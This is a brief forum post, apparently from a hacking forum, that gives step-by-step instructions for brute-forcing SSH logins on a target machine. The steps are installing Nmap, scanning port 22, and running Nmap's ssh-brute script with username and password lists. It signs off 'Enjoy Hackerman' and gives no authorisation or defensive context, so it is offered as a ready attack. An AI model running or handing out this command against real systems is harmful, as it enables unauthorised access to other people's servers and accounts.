#1
(This post was last modified: 31 March, 2022 - 05:09 PM by watmore. Edited 2 times in total.)
1.Install Nmap - https://nmap.org/book/install.html It should come preinstalled but whatever

2.Open Terminal Optional command to check if port 22 is open -- nmap -Pn target's IP

3.Enter This Command -- nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst \ --script-args ssh-brute.timeout=4s Insert Target target

Enjoy  Hackerman